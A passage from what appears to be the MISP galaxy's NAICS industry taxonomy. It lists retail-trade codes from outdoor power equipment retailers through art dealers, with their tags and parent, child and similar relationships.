  • child-of: misp-galaxy:naics="4442" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444230" with estimative-language:likelihood-probability="likely"

444230

Outdoor Power Equipment Retailers

The tag is: misp-galaxy:naics="444230"

444230 has relationships with:

  • child-of: misp-galaxy:naics="4442" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44423" with estimative-language:likelihood-probability="likely"

44424

Nursery, Garden Center, and Farm Supply Retailers

The tag is: misp-galaxy:naics="44424"

44424 has relationships with:

  • child-of: misp-galaxy:naics="4442" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="444240" with estimative-language:likelihood-probability="likely"

444240

Nursery, Garden Center, and Farm Supply Retailers

The tag is: misp-galaxy:naics="444240"

444240 has relationships with:

  • child-of: misp-galaxy:naics="4442" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44424" with estimative-language:likelihood-probability="likely"

445

Food and Beverage Retailers

The tag is: misp-galaxy:naics="445"

445 has relationships with:

  • parent-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4453" with estimative-language:likelihood-probability="likely"

4451

Grocery and Convenience Retailers

The tag is: misp-galaxy:naics="4451"

4451 has relationships with:

  • child-of: misp-galaxy:naics="445" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445132" with estimative-language:likelihood-probability="likely"

44511

Supermarkets and Other Grocery Retailers (except Convenience Retailers)

The tag is: misp-galaxy:naics="44511"

44511 has relationships with:

  • child-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="445110" with estimative-language:likelihood-probability="likely"

445110

Supermarkets and Other Grocery Retailers (except Convenience Retailers)

The tag is: misp-galaxy:naics="445110"

445110 has relationships with:

  • child-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44511" with estimative-language:likelihood-probability="likely"

44513

Convenience Retailers and Vending Machine Operators

The tag is: misp-galaxy:naics="44513"

44513 has relationships with:

  • child-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

445131

Convenience Retailers

The tag is: misp-galaxy:naics="445131"

445131 has relationships with:

  • child-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

445132

Vending Machine Operators

The tag is: misp-galaxy:naics="445132"

445132 has relationships with:

  • child-of: misp-galaxy:naics="4451" with estimative-language:likelihood-probability="likely"

4452

Specialty Food Retailers

The tag is: misp-galaxy:naics="4452"

4452 has relationships with:

  • child-of: misp-galaxy:naics="445" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44524" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445240" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44525" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445250" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44529" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445298" with estimative-language:likelihood-probability="likely"

44523

Fruit and Vegetable Retailers

The tag is: misp-galaxy:naics="44523"

44523 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="445230" with estimative-language:likelihood-probability="likely"

445230

Fruit and Vegetable Retailers

The tag is: misp-galaxy:naics="445230"

445230 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44523" with estimative-language:likelihood-probability="likely"

44524

Meat Retailers

The tag is: misp-galaxy:naics="44524"

44524 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="445240" with estimative-language:likelihood-probability="likely"

445240

Meat Retailers

The tag is: misp-galaxy:naics="445240"

445240 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44524" with estimative-language:likelihood-probability="likely"

44525

Fish and Seafood Retailers

The tag is: misp-galaxy:naics="44525"

44525 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="445250" with estimative-language:likelihood-probability="likely"

445250

Fish and Seafood Retailers

The tag is: misp-galaxy:naics="445250"

445250 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44525" with estimative-language:likelihood-probability="likely"

44529

Other Specialty Food Retailers

The tag is: misp-galaxy:naics="44529"

44529 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

445291

Baked Goods Retailers

The tag is: misp-galaxy:naics="445291"

445291 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

445292

Confectionery and Nut Retailers

The tag is: misp-galaxy:naics="445292"

445292 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

445298

All Other Specialty Food Retailers

The tag is: misp-galaxy:naics="445298"

445298 has relationships with:

  • child-of: misp-galaxy:naics="4452" with estimative-language:likelihood-probability="likely"

4453

Beer, Wine, and Liquor Retailers

The tag is: misp-galaxy:naics="4453"

4453 has relationships with:

  • child-of: misp-galaxy:naics="445" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="445320" with estimative-language:likelihood-probability="likely"

44532

Beer, Wine, and Liquor Retailers

The tag is: misp-galaxy:naics="44532"

44532 has relationships with:

  • child-of: misp-galaxy:naics="4453" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="445320" with estimative-language:likelihood-probability="likely"

445320

Beer, Wine, and Liquor Retailers

The tag is: misp-galaxy:naics="445320"

445320 has relationships with:

  • child-of: misp-galaxy:naics="4453" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44532" with estimative-language:likelihood-probability="likely"

449

Furniture, Home Furnishings, Electronics, and Appliance Retailers

The tag is: misp-galaxy:naics="449"

449 has relationships with:

  • parent-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4492" with estimative-language:likelihood-probability="likely"

4491

Furniture and Home Furnishings Retailers

The tag is: misp-galaxy:naics="4491"

4491 has relationships with:

  • child-of: misp-galaxy:naics="449" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="449110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44912" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="449121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="449122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="449129" with estimative-language:likelihood-probability="likely"

44911

Furniture Retailers

The tag is: misp-galaxy:naics="44911"

44911 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="449110" with estimative-language:likelihood-probability="likely"

449110

Furniture Retailers

The tag is: misp-galaxy:naics="449110"

449110 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44911" with estimative-language:likelihood-probability="likely"

44912

Home Furnishings Retailers

The tag is: misp-galaxy:naics="44912"

44912 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

449121

Floor Covering Retailers

The tag is: misp-galaxy:naics="449121"

449121 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

449122

Window Treatment Retailers

The tag is: misp-galaxy:naics="449122"

449122 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

449129

All Other Home Furnishings Retailers

The tag is: misp-galaxy:naics="449129"

449129 has relationships with:

  • child-of: misp-galaxy:naics="4491" with estimative-language:likelihood-probability="likely"

4492

Electronics and Appliance Retailers

The tag is: misp-galaxy:naics="4492"

4492 has relationships with:

  • child-of: misp-galaxy:naics="449" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="44921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="449210" with estimative-language:likelihood-probability="likely"

44921

Electronics and Appliance Retailers

The tag is: misp-galaxy:naics="44921"

44921 has relationships with:

  • child-of: misp-galaxy:naics="4492" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="449210" with estimative-language:likelihood-probability="likely"

449210

Electronics and Appliance Retailers

The tag is: misp-galaxy:naics="449210"

449210 has relationships with:

  • child-of: misp-galaxy:naics="4492" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="44921" with estimative-language:likelihood-probability="likely"

455

General Merchandise Retailers

The tag is: misp-galaxy:naics="455"

455 has relationships with:

  • parent-of: misp-galaxy:naics="4551" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4552" with estimative-language:likelihood-probability="likely"

4551

Department Stores

The tag is: misp-galaxy:naics="4551"

4551 has relationships with:

  • child-of: misp-galaxy:naics="455" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="455110" with estimative-language:likelihood-probability="likely"

45511

Department Stores

The tag is: misp-galaxy:naics="45511"

45511 has relationships with:

  • child-of: misp-galaxy:naics="4551" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="455110" with estimative-language:likelihood-probability="likely"

455110

Department Stores

The tag is: misp-galaxy:naics="455110"

455110 has relationships with:

  • child-of: misp-galaxy:naics="4551" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45511" with estimative-language:likelihood-probability="likely"

4552

Warehouse Clubs, Supercenters, and Other General Merchandise Retailers

The tag is: misp-galaxy:naics="4552"

4552 has relationships with:

  • child-of: misp-galaxy:naics="455" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="455211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="455219" with estimative-language:likelihood-probability="likely"

45521

Warehouse Clubs, Supercenters, and Other General Merchandise Retailers

The tag is: misp-galaxy:naics="45521"

45521 has relationships with:

  • child-of: misp-galaxy:naics="4552" with estimative-language:likelihood-probability="likely"

455211

Warehouse Clubs and Supercenters

The tag is: misp-galaxy:naics="455211"

455211 has relationships with:

  • child-of: misp-galaxy:naics="4552" with estimative-language:likelihood-probability="likely"

455219

All Other General Merchandise Retailers

The tag is: misp-galaxy:naics="455219"

455219 has relationships with:

  • child-of: misp-galaxy:naics="4552" with estimative-language:likelihood-probability="likely"

456

Health and Personal Care Retailers

The tag is: misp-galaxy:naics="456"

456 has relationships with:

  • parent-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

4561

Health and Personal Care Retailers

The tag is: misp-galaxy:naics="4561"

4561 has relationships with:

  • child-of: misp-galaxy:naics="456" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="456110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="456120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="456130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45619" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="456191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="456199" with estimative-language:likelihood-probability="likely"

45611

Pharmacies and Drug Retailers

The tag is: misp-galaxy:naics="45611"

45611 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="456110" with estimative-language:likelihood-probability="likely"

456110

Pharmacies and Drug Retailers

The tag is: misp-galaxy:naics="456110"

456110 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45611" with estimative-language:likelihood-probability="likely"

45612

Cosmetics, Beauty Supplies, and Perfume Retailers

The tag is: misp-galaxy:naics="45612"

45612 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="456120" with estimative-language:likelihood-probability="likely"

456120

Cosmetics, Beauty Supplies, and Perfume Retailers

The tag is: misp-galaxy:naics="456120"

456120 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45612" with estimative-language:likelihood-probability="likely"

45613

Optical Goods Retailers

The tag is: misp-galaxy:naics="45613"

45613 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="456130" with estimative-language:likelihood-probability="likely"

456130

Optical Goods Retailers

The tag is: misp-galaxy:naics="456130"

456130 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45613" with estimative-language:likelihood-probability="likely"

45619

Other Health and Personal Care Retailers

The tag is: misp-galaxy:naics="45619"

45619 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

456191

Food (Health) Supplement Retailers

The tag is: misp-galaxy:naics="456191"

456191 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

456199

All Other Health and Personal Care Retailers

The tag is: misp-galaxy:naics="456199"

456199 has relationships with:

  • child-of: misp-galaxy:naics="4561" with estimative-language:likelihood-probability="likely"

457

Gasoline Stations and Fuel Dealers

The tag is: misp-galaxy:naics="457"

457 has relationships with:

  • parent-of: misp-galaxy:naics="4571" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4572" with estimative-language:likelihood-probability="likely"

4571

Gasoline Stations

The tag is: misp-galaxy:naics="4571"

4571 has relationships with:

  • child-of: misp-galaxy:naics="457" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="457110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="457120" with estimative-language:likelihood-probability="likely"

45711

Gasoline Stations with Convenience Stores

The tag is: misp-galaxy:naics="45711"

45711 has relationships with:

  • child-of: misp-galaxy:naics="4571" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="457110" with estimative-language:likelihood-probability="likely"

457110

Gasoline Stations with Convenience Stores

The tag is: misp-galaxy:naics="457110"

457110 has relationships with:

  • child-of: misp-galaxy:naics="4571" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45711" with estimative-language:likelihood-probability="likely"

45712

Other Gasoline Stations

The tag is: misp-galaxy:naics="45712"

45712 has relationships with:

  • child-of: misp-galaxy:naics="4571" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="457120" with estimative-language:likelihood-probability="likely"

457120

Other Gasoline Stations

The tag is: misp-galaxy:naics="457120"

457120 has relationships with:

  • child-of: misp-galaxy:naics="4571" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45712" with estimative-language:likelihood-probability="likely"

4572

Fuel Dealers

The tag is: misp-galaxy:naics="4572"

4572 has relationships with:

  • child-of: misp-galaxy:naics="457" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="457210" with estimative-language:likelihood-probability="likely"

45721

Fuel Dealers

The tag is: misp-galaxy:naics="45721"

45721 has relationships with:

  • child-of: misp-galaxy:naics="4572" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="457210" with estimative-language:likelihood-probability="likely"

457210

Fuel Dealers

The tag is: misp-galaxy:naics="457210"

457210 has relationships with:

  • child-of: misp-galaxy:naics="4572" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45721" with estimative-language:likelihood-probability="likely"

458

Clothing, Clothing Accessories, Shoe, and Jewelry Retailers

The tag is: misp-galaxy:naics="458"

458 has relationships with:

  • parent-of: misp-galaxy:naics="4581" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4582" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4583" with estimative-language:likelihood-probability="likely"

4581

Clothing and Clothing Accessories Retailers

The tag is: misp-galaxy:naics="4581"

4581 has relationships with:

  • child-of: misp-galaxy:naics="458" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="458110" with estimative-language:likelihood-probability="likely"

45811

Clothing and Clothing Accessories Retailers

The tag is: misp-galaxy:naics="45811"

45811 has relationships with:

  • child-of: misp-galaxy:naics="4581" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="458110" with estimative-language:likelihood-probability="likely"

458110

Clothing and Clothing Accessories Retailers

The tag is: misp-galaxy:naics="458110"

458110 has relationships with:

  • child-of: misp-galaxy:naics="4581" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45811" with estimative-language:likelihood-probability="likely"

4582

Shoe Retailers

The tag is: misp-galaxy:naics="4582"

4582 has relationships with:

  • child-of: misp-galaxy:naics="458" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45821" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="458210" with estimative-language:likelihood-probability="likely"

45821

Shoe Retailers

The tag is: misp-galaxy:naics="45821"

45821 has relationships with:

  • child-of: misp-galaxy:naics="4582" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="458210" with estimative-language:likelihood-probability="likely"

458210

Shoe Retailers

The tag is: misp-galaxy:naics="458210"

458210 has relationships with:

  • child-of: misp-galaxy:naics="4582" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45821" with estimative-language:likelihood-probability="likely"

4583

Jewelry, Luggage, and Leather Goods Retailers

The tag is: misp-galaxy:naics="4583"

4583 has relationships with:

  • child-of: misp-galaxy:naics="458" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45831" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="458310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45832" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="458320" with estimative-language:likelihood-probability="likely"

45831

Jewelry Retailers

The tag is: misp-galaxy:naics="45831"

45831 has relationships with:

  • child-of: misp-galaxy:naics="4583" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="458310" with estimative-language:likelihood-probability="likely"

458310

Jewelry Retailers

The tag is: misp-galaxy:naics="458310"

458310 has relationships with:

  • child-of: misp-galaxy:naics="4583" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45831" with estimative-language:likelihood-probability="likely"

45832

Luggage and Leather Goods Retailers

The tag is: misp-galaxy:naics="45832"

45832 has relationships with:

  • child-of: misp-galaxy:naics="4583" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="458320" with estimative-language:likelihood-probability="likely"

458320

Luggage and Leather Goods Retailers

The tag is: misp-galaxy:naics="458320"

458320 has relationships with:

  • child-of: misp-galaxy:naics="4583" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45832" with estimative-language:likelihood-probability="likely"

459

Sporting Goods, Hobby, Musical Instrument, Book, and Miscellaneous Retailers

The tag is: misp-galaxy:naics="459"

459 has relationships with:

  • parent-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4592" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4593" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4594" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4595" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

4591

Sporting Goods, Hobby, and Musical Instrument Retailers

The tag is: misp-galaxy:naics="4591"

4591 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45912" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45913" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45914" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459140" with estimative-language:likelihood-probability="likely"

45911

Sporting Goods Retailers

The tag is: misp-galaxy:naics="45911"

45911 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459110" with estimative-language:likelihood-probability="likely"

459110

Sporting Goods Retailers

The tag is: misp-galaxy:naics="459110"

459110 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45911" with estimative-language:likelihood-probability="likely"

45912

Hobby, Toy, and Game Retailers

The tag is: misp-galaxy:naics="45912"

45912 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459120" with estimative-language:likelihood-probability="likely"

459120

Hobby, Toy, and Game Retailers

The tag is: misp-galaxy:naics="459120"

459120 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45912" with estimative-language:likelihood-probability="likely"

45913

Sewing, Needlework, and Piece Goods Retailers

The tag is: misp-galaxy:naics="45913"

45913 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459130" with estimative-language:likelihood-probability="likely"

459130

Sewing, Needlework, and Piece Goods Retailers

The tag is: misp-galaxy:naics="459130"

459130 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45913" with estimative-language:likelihood-probability="likely"

45914

Musical Instrument and Supplies Retailers

The tag is: misp-galaxy:naics="45914"

45914 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459140" with estimative-language:likelihood-probability="likely"

459140

Musical Instrument and Supplies Retailers

The tag is: misp-galaxy:naics="459140"

459140 has relationships with:

  • child-of: misp-galaxy:naics="4591" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45914" with estimative-language:likelihood-probability="likely"

4592

Book Retailers and News Dealers

The tag is: misp-galaxy:naics="4592"

4592 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459210" with estimative-language:likelihood-probability="likely"

45921

Book Retailers and News Dealers

The tag is: misp-galaxy:naics="45921"

45921 has relationships with:

  • child-of: misp-galaxy:naics="4592" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459210" with estimative-language:likelihood-probability="likely"

459210

Book Retailers and News Dealers

The tag is: misp-galaxy:naics="459210"

459210 has relationships with:

  • child-of: misp-galaxy:naics="4592" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45921" with estimative-language:likelihood-probability="likely"

4593

Florists

The tag is: misp-galaxy:naics="4593"

4593 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45931" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459310" with estimative-language:likelihood-probability="likely"

45931

Florists

The tag is: misp-galaxy:naics="45931"

45931 has relationships with:

  • child-of: misp-galaxy:naics="4593" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459310" with estimative-language:likelihood-probability="likely"

459310

Florists

The tag is: misp-galaxy:naics="459310"

459310 has relationships with:

  • child-of: misp-galaxy:naics="4593" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45931" with estimative-language:likelihood-probability="likely"

4594

Office Supplies, Stationery, and Gift Retailers

The tag is: misp-galaxy:naics="4594"

4594 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45941" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45942" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459420" with estimative-language:likelihood-probability="likely"

45941

Office Supplies and Stationery Retailers

The tag is: misp-galaxy:naics="45941"

45941 has relationships with:

  • child-of: misp-galaxy:naics="4594" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459410" with estimative-language:likelihood-probability="likely"

459410

Office Supplies and Stationery Retailers

The tag is: misp-galaxy:naics="459410"

459410 has relationships with:

  • child-of: misp-galaxy:naics="4594" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45941" with estimative-language:likelihood-probability="likely"

45942

Gift, Novelty, and Souvenir Retailers

The tag is: misp-galaxy:naics="45942"

45942 has relationships with:

  • child-of: misp-galaxy:naics="4594" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459420" with estimative-language:likelihood-probability="likely"

459420

Gift, Novelty, and Souvenir Retailers

The tag is: misp-galaxy:naics="459420"

459420 has relationships with:

  • child-of: misp-galaxy:naics="4594" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45942" with estimative-language:likelihood-probability="likely"

4595

Used Merchandise Retailers

The tag is: misp-galaxy:naics="4595"

4595 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45951" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459510" with estimative-language:likelihood-probability="likely"

45951

Used Merchandise Retailers

The tag is: misp-galaxy:naics="45951"

45951 has relationships with:

  • child-of: misp-galaxy:naics="4595" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459510" with estimative-language:likelihood-probability="likely"

459510

Used Merchandise Retailers

The tag is: misp-galaxy:naics="459510"

459510 has relationships with:

  • child-of: misp-galaxy:naics="4595" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45951" with estimative-language:likelihood-probability="likely"

4599

Other Miscellaneous Retailers

The tag is: misp-galaxy:naics="4599"

4599 has relationships with:

  • child-of: misp-galaxy:naics="459" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="45999" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="459999" with estimative-language:likelihood-probability="likely"

45991

Pet and Pet Supplies Retailers

The tag is: misp-galaxy:naics="45991"

45991 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459910" with estimative-language:likelihood-probability="likely"

459910

Pet and Pet Supplies Retailers

The tag is: misp-galaxy:naics="459910"

459910 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="45991" with estimative-language:likelihood-probability="likely"

45992

Art Dealers

The tag is: misp-galaxy:naics="45992"

45992 has relationships with:

  • child-of: misp-galaxy:naics="4599" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="459920" with estimative-language:likelihood-probability="likely"

459920

Art Dealers

The tag is: misp-galaxy:naics="459920"
